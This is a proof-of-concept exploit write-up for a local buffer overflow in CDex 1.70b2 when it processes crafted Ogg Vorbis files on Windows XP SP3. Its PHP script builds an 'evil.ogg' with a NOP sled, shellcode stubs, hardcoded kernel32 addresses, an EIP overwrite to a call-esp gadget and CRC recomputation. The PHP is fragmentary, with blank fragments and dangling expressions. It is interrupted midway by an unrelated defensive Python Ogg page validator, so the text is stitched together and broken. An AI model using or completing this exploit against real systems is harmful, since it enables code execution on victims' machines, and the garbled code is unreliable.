
CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)

by Nine:Situations:Group::Pyrokinesis

software site: http://cdexos.sourceforge.net/

our site: http://retrogod.altervista.org/

A very reliable buffer overflow exists in the way CDex processes Ogg Vorbis info.

c:\php\php 9sg_cdex_local.php

evil.ogg is created, now navigate:

Main Menu -> Tools -> Media file Player -> Select files -> Browse to a folder ->
-> Open -> Play evil.ogg


$_frgmnt1 =
"OggS".                             // capture pattern, marks the beginning of a page
"\x00".                             // stream_structure_version
"\x02".                             // header_type_flag (0x02 = beginning of stream)
"\x00\x00\x00\x00\x00\x00\x00\x00". // granule_position
"\x66\x07\x00\x00".                 // bitstream_serial_number
"\x00\x00\x00\x00".                 // page_sequence_number
"\x92\xa8\x3b\xd9".                 // CRC_checksum
"\x01".                             // number_page_segments
"\x1e".                             // segments_table (one lacing value: a 30-byte packet)





$_frgmnt2 =




"\x00\x00\x00\x00". //set crc to 0, after calculate the real crc












//msg box shellcode saying "hey" ...

//replace with your own, the script recalculates the CRC checksum

$scode =


"\xbb\x7b\x1d\x80\x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll  xpsp3


"\xbb\x30\xae\x80\x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll



"\xb8\xfa\xca\x81\x7c". //ExitProcess at 0x7c81cafa in kernel32.dll





$_boom=str_repeat("\x90",2048 - strlen($scode)).$scode.

"\x67\x86\x86\x7c".  //eip -> 0x7C868667      call esp kernel32.dll


"\x83\xec\x7f". // sub esp,07f
"\x83\xec\x7f". // ..
"\x83\xec\x7f". // ..
"\x83\xec\x7f". // ..
"\x83\xec\x7f". // ..
"\xff\xd4".     // call esp


"\x00\x00\x00\x00";//if replaced with non-zero chars, overwrites seh ... do not 

 - strlen($_boom) - 8);

function crcOgg (&$_x)
{
        $crc = 0;               // Ogg CRC-32: init 0, MSB-first, no final xor
        $polynom = 0x04C11DB7;  // polynomial generator
        for ($i = 0; $i < strlen($_x); $i++)
        {
                $c = ord($_x[$i]);
                for ($j = 0; $j < 8; $j++)
                {
                        $bit = 0;
                        if ($crc & 0x80000000) $bit = 1;
                        if ($c & 0x80) $bit ^= 1;
                        $c <<= 1;
                        $crc = ($crc << 1) & 0xFFFFFFFF;  // keep 32 bits on 64-bit PHP
                        if ($bit) $crc ^= $polynom;
                }
        }
        // write the checksum into the page header (little-endian, offset 22)
        $_x[22] = chr($crc & 0xFF);         $_x[23] = chr(($crc >> 8) & 0xFF);
        $_x[24] = chr(($crc >> 16) & 0xFF); $_x[25] = chr(($crc >> 24) & 0xFF);
}
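The page header fields listed at the top and the CRC routine above are the two things a parser has to get right before it trusts any length in an Ogg file. The following is an added example, not part of the PoC and not CDex code: a small Python validator (Python rather than the PoC's PHP, so it can be run as a unit test) that parses page headers, bounds-checks the segment table against the data actually present, and verifies the same CRC-32 (polynomial 0x04C11DB7, initial value 0, no reflection, no final xor) over the page with the checksum field zeroed. The sample input is constructed inline: a 30-byte Vorbis identification header, the same packet size the PoC's segment table (0x1e) announces, wrapped in a beginning-of-stream page with the PoC's serial number 0x0766; the field values inside it are arbitrary.

```python
"""Ogg page validator (added example): parses page headers and verifies the
Ogg CRC-32 before any field (segment table, lacing values) is trusted."""
import struct

OGG_POLY = 0x04C11DB7                      # same generator as the PHP crcOgg()
HEADER = struct.Struct("<4sBBqIIIB")       # 27-byte page header, little-endian
CRC_OFFSET = 22                            # CRC field sits at bytes 22..25


def ogg_crc32(data: bytes) -> int:
    """CRC-32 as Ogg uses it: poly 0x04C11DB7, init 0, MSB-first, no final XOR."""
    crc = 0
    for byte in data:
        crc ^= byte << 24
        for _ in range(8):
            crc = ((crc << 1) ^ OGG_POLY) if crc & 0x80000000 else (crc << 1)
            crc &= 0xFFFFFFFF              # keep 32 bits
    return crc


def parse_page(buf: bytes, offset: int = 0):
    """Parse one page at `offset`. Returns (fields, next_offset); raises
    ValueError on any structural problem or CRC mismatch."""
    if len(buf) - offset < HEADER.size:
        raise ValueError("truncated page header")
    capture, version, htype, granule, serial, seq, crc, nseg = HEADER.unpack_from(buf, offset)
    if capture != b"OggS":
        raise ValueError("bad capture pattern")
    if version != 0:
        raise ValueError(f"unsupported stream_structure_version {version}")
    if htype & ~0x07:
        raise ValueError(f"reserved header_type_flag bits set: 0x{htype:02x}")
    seg_start = offset + HEADER.size
    seg_end = seg_start + nseg
    if seg_end > len(buf):
        raise ValueError("truncated segment table")
    segments = list(buf[seg_start:seg_end])
    body_end = seg_end + sum(segments)     # lacing values give the body length
    if body_end > len(buf):
        raise ValueError("segment table claims more body than is present")
    page = bytearray(buf[offset:body_end])
    page[CRC_OFFSET:CRC_OFFSET + 4] = b"\x00" * 4   # CRC is computed with the field zeroed
    computed = ogg_crc32(bytes(page))
    if computed != crc:
        raise ValueError(f"CRC mismatch: header 0x{crc:08x}, computed 0x{computed:08x}")
    fields = dict(header_type=htype, granule=granule, serial=serial, seq=seq,
                  segments=segments, body=bytes(buf[seg_end:body_end]))
    return fields, body_end


def build_page(body: bytes, serial: int, seq: int, htype: int = 0, granule: int = 0) -> bytes:
    """Construct a well-formed page around `body` (used here only to make test input)."""
    segments = bytes([255] * (len(body) // 255) + [len(body) % 255])
    if len(segments) > 255:
        raise ValueError("body too long for one page")
    header = HEADER.pack(b"OggS", 0, htype, granule, serial, seq, 0, len(segments))
    page = bytearray(header + segments + body)
    struct.pack_into("<I", page, CRC_OFFSET, ogg_crc32(bytes(page)))
    return bytes(page)


def check_stream(buf: bytes) -> list:
    """Walk every page in `buf`; return a list of problems (empty means clean)."""
    problems, offset = [], 0
    while offset < len(buf):
        try:
            _, offset = parse_page(buf, offset)
        except ValueError as exc:
            problems.append(f"page at offset {offset}: {exc}")
            break                          # nothing after a bad page can be trusted
    return problems


# Constructed sample: a 30-byte Vorbis identification header (the size the PoC's
# segment table, 0x1e, announces) in a beginning-of-stream page, serial 0x0766.
IDENT_BODY = b"\x01vorbis" + struct.pack("<IBIiiiBB", 0, 2, 44100, 0, 128000, 0, 0xB8, 1)
GOOD_PAGE = build_page(IDENT_BODY, serial=0x0766, seq=0, htype=0x02)


def tampered_page() -> bytes:
    """GOOD_PAGE with one body byte flipped and the CRC left untouched."""
    page = bytearray(GOOD_PAGE)
    page[40] ^= 0xFF
    return bytes(page)


if __name__ == "__main__":
    print("clean stream :", check_stream(GOOD_PAGE) or "no problems")
    print("tampered page:", check_stream(tampered_page()))
```

The CRC check only proves that the page was not corrupted in transit; a file built with a recomputed checksum, as the PoC's script does, passes it. What protects a decoder is the bounds checking that precedes the CRC in `parse_page`: the segment count and the sum of the lacing values are compared against the bytes actually present before anything is copied, which is the check a parser must apply to every length it reads from the file.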


if (!$fp) {die("cannot create evil.ogg...");}




original url: http://retrogod.altervista.org/9sg_cdex_ogg.html
